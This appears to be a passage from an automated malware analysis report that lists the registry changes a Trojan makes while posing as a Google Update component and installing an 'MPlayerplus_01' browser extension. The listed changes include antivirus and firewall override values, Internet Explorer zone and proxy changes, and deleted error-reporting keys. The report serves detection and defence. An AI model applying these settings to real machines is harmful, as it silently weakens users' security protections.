[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"
[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"
[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"
[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 9D 5B 2C 25 22 B6 61 FA EC BE 47 B7 0C F6 F1"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"
[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process GoogleUpdate.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 34 09 4C C7 E6 81 D7 1A AA 6A A0 D2 1D 06"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 50 26 F1 F0 98 AB 00 17 4C 40 9D 67 39 12 4B"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 8B 23 88 65 65 F9 5D 2D BE 45 A6 87 AB C1 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process Iufkopcpdfjpcg.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\extensionData\,"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Name" = "Freeven"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54246" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"Publisher" = "Freeven"
[HKCU\Software\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"UninstallString" = "%Program Files%\MPlayerplus_01\Uninstall.exe /fcp=1"
"DisplayName" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayVersion" = "1.34.5.12"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrPublisherId" = "21636"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrAppId" = "54246"
[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledChrome" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"srcid_var" = "001359"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayIcon" = "%Program Files%\MPlayerplus_01\utils.exe"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 9B AC B7 08 AE 3C 95 8A CB 9E E3 B4 AF DF 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"MPlayerplus_01-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"pv" = "1.3.25.0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process MPlayerplus_01-bg.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 66 9A 82 C6 A9 5C 2A BA 11 AA 66 12 93 F0 B4"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 B8 6F 84 AA 5F DB F5 AC 99 5D CC C9 A8 C4 88"
The process %original file name%.exe:688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Aas]
"a4_440" = "3154413240"
"a3_694" = "697136351"
"a2_348" = "2494852663"
"a2_349" = "2502018958"
"a2_346" = "2480517434"
"a2_347" = "2487687425"
"a2_344" = "2466170459"
"a2_345" = "2473349206"
"a2_342" = "2451833014"
"a2_343" = "2459002071"
"a2_340" = "2437499380"
"a2_341" = "2444662296"
"a2_180" = "1290440362"
"a2_181" = "1297602767"
"a2_182" = "1304788269"
"a2_183" = "1311955815"
"a2_184" = "1319124367"
"a2_185" = "1326289542"
"a2_186" = "1333458657"
"a2_187" = "1340623160"
"a2_188" = "1347792160"
"a2_189" = "1354960161"
"a4_444" = "3183089724"
"a3_789" = "1344615644"
"a3_788" = "1371246781"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Aas]
"a2_749" = "1074705966"
"a2_742" = "1024512356"
"a2_743" = "1031684630"
"a2_740" = "1010184819"
"a2_741" = "1017353326"
"a2_746" = "1053202893"
"a2_747" = "1060372337"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a2_745" = "1046020652"
"a1_503" = "3994623438"
"a1_502" = "2625696392"
"a1_501" = "1097175946"
"a1_500" = "3593083589"
"a1_507" = "3455656332"
"a1_506" = "1518301959"
"a1_505" = "1186462203"
"a1_504" = "2339679818"
"a1_509" = "1785822827"
"a1_508" = "27410977"
"a3_659" = "412749722"
"a3_658" = "405760891"
"a4_844" = "1755770828"
"a1_946" = "1970892090"
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"
"a3_70" = "485103791"
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a3_259" = "1873798154"
"a3_258" = "1866220523"
"a1_435" = "2888476118"
"a1_434" = "3074810568"
"a1_433" = "558333122"
"a1_432" = "2013215030"
"a1_431" = "3530835708"
"a1_430" = "929914560"
"a3_251" = "1782710578"
"a3_250" = "1809280147"
"a3_253" = "1830771188"
"a3_252" = "1789764949"
"a3_255" = "1844811446"
"a3_254" = "1837822487"
"a3_257" = "1825746760"
"a3_256" = "1818692393"
"a3_784" = "1308623673"
"a3_783" = "1335193222"
"a3_782" = "1328269927"
"a3_781" = "1287147972"
"a1_636" = "744229795"
"a3_321" = "2284435336"
"a3_320" = "2310935401"
"a3_323" = "2332478538"
"a3_322" = "2291869739"
"a3_325" = "2346910988"
"a3_324" = "2339397869"
"a3_327" = "2327338446"
"a3_326" = "2320415151"
"a3_329" = "2375379584"
"a3_328" = "2368468577"
"a3_971" = "2682835394"
"a1_729" = "2502649842"
"a1_728" = "29197973"
"a3_439" = "3130280062"
"a3_438" = "3123369951"
"a3_435" = "3101883130"
"a3_434" = "3094824539"
"a3_437" = "3149870012"
"a3_436" = "3142426397"
"a3_431" = "3106444646"
"a3_430" = "3065901255"
"a3_433" = "3087376952"
"a3_432" = "3113879961"
"a4_818" = "1569373682"
"a4_819" = "1576542803"
"a4_810" = "1512020714"
"a4_811" = "1519189835"
"a4_812" = "1526358956"
"a4_813" = "1533528077"
"a4_814" = "1540697198"
"a4_815" = "1547866319"
"a4_816" = "1555035440"
"a4_817" = "1562204561"
"a1_670" = "3561868675"
"a2_748" = "1067543083"
"a1_593" = "3124866917"
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"
"a3_98" = "685967115"
"a3_99" = "726580138"
"a4_605" = "42350909"
"a4_604" = "35181788"
"a4_607" = "56689151"
"a4_606" = "49520030"
"a4_601" = "13674425"
"a4_600" = "6505304"
"a4_603" = "28012667"
"a4_602" = "20843546"
"a4_979" = "2723602163"
"a4_978" = "2716433042"
"a4_609" = "71027393"
"a4_608" = "63858272"
"a1_987" = "241353365"
"a1_986" = "618529064"
"a1_985" = "3435510135"
"a1_984" = "905895076"
"a1_983" = "421682490"
"a1_982" = "1322042214"
"a1_981" = "1979044346"
"a1_980" = "1270819567"
"a1_989" = "1028911139"
"a1_988" = "1943603761"
"a3_869" = "1918293868"
"a2_744" = "1038850617"
"a1_855" = "3217855051"
"a3_655" = "383827462"
"a1_857" = "2160582624"
"a1_856" = "3871757978"
"a1_851" = "2694477355"
"a1_850" = "199431336"
"a1_853" = "3964469857"
"a3_654" = "376767975"
"a1_859" = "3655691317"
"a3_657" = "431879896"
"a4_779" = "1289777963"
"a4_778" = "1282608842"
"a3_929" = "2381983272"
"a3_656" = "424825529"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Aas]
"a4_771" = "1232424995"
"a3_651" = "388835458"
"a4_773" = "1246763237"
"a4_772" = "1239594116"
"a4_775" = "1261101479"
"a4_774" = "1253932358"
"a4_777" = "1275439721"
"a3_650" = "348370019"
"a3_653" = "369779012"
"a3_652" = "395889957"
"a4_151" = "1082537271"
"a4_150" = "1075368150"
"a4_153" = "1096875513"
"a4_152" = "1089706392"
"a4_155" = "1111213755"
"a4_154" = "1104044634"
"a4_157" = "1125551997"
"a4_156" = "1118382876"
"a4_159" = "1139890239"
"a4_158" = "1132721118"
"a1_185" = "1203113420"
"a1_184" = "143343863"
"a1_183" = "3740399901"
"a1_182" = "3318210109"
"a1_181" = "1661917115"
"a1_180" = "2134795656"
"a1_963" = "2859192252"
"a4_559" = "4007538639"
"a4_558" = "4000369518"
"a4_555" = "3978862155"
"a4_554" = "3971693034"
"a4_557" = "3993200397"
"a4_556" = "3986031276"
"a4_551" = "3950185671"
"a4_550" = "3943016550"
"a4_553" = "3964523913"
